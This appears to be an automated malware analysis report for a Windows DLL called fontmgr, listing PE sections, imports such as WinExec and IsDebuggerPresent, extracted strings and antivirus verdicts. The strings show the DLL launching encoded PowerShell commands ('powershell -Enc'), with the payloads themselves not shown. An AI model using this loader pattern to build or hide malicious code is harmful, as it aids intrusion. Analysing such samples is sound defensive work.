
PE Compile Time

2021-09-06 20:43:32

PDB Path

D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb

PE Imphash

32b1df407523bd5c4bab9e39f39c7353

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00000e8d 0x00001000 5.95942419168
.rdata 0x00002000 0x000065da 0x00006600 4.39292872523
.data 0x00009000 0x00000398 0x00000200 0.265466870762
.rsrc 0x0000a000 0x000000f8 0x00000200 2.51196201565
.reloc 0x0000b000 0x0000015c 0x00000200 4.80246590103

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x0000a060 0x00000091 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x10002000 WinExec
0x10002004 IsDebuggerPresent
0x10002008 InitializeSListHead
0x10002010 GetCurrentThreadId
0x10002014 GetCurrentProcessId
0x10002020 TerminateProcess
0x10002024 GetCurrentProcess
Library VCRUNTIME140.dll:
0x10002034 memset
Library api-ms-win-crt-runtime-l1-1-0.dll:
0x10002044 _cexit
0x10002048 _seh_filter_dll
0x1000204c _initterm_e
0x10002050 _initterm
0x1000205c _execute_onexit_table
0x10002060 _configure_narrow_argv

!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
powershell -Enc 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
powershell -Enc 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
RSDSbzm
D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCZ
.CRT$XIA
.CRT$XIZ
.CRT$XPA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
WinExec
KERNEL32.dll
__std_type_info_destroy_list
memset
_except_handler4_common
VCRUNTIME140.dll
_initterm
_initterm_e
_seh_filter_dll
_configure_narrow_argv
_initialize_narrow_environment
_initialize_onexit_table
_execute_onexit_table
_cexit
api-ms-win-crt-runtime-l1-1-0.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
</assembly>
0%0^0~0
2*2/2H2M2Z2
45%5+51575=5D5K5R5Y5`5g5n5v5~5
6!6*676M6
7!8T8z8
<-=6=?=M=V=x=
T?X?`?
Antivirus Signature
Bkav W32.AIDetect.malware2
Lionic Clean
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
CrowdStrike Clean
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
Baidu Clean
TrendMicro-HouseCall Clean
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Rising Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
SentinelOne Clean
FireEye Clean
Sophos Clean
APEX Clean
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
TACHYON Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
eGambit Clean
Fortinet Clean
Avast Clean
MaxSecure Clean
No IRMA results available.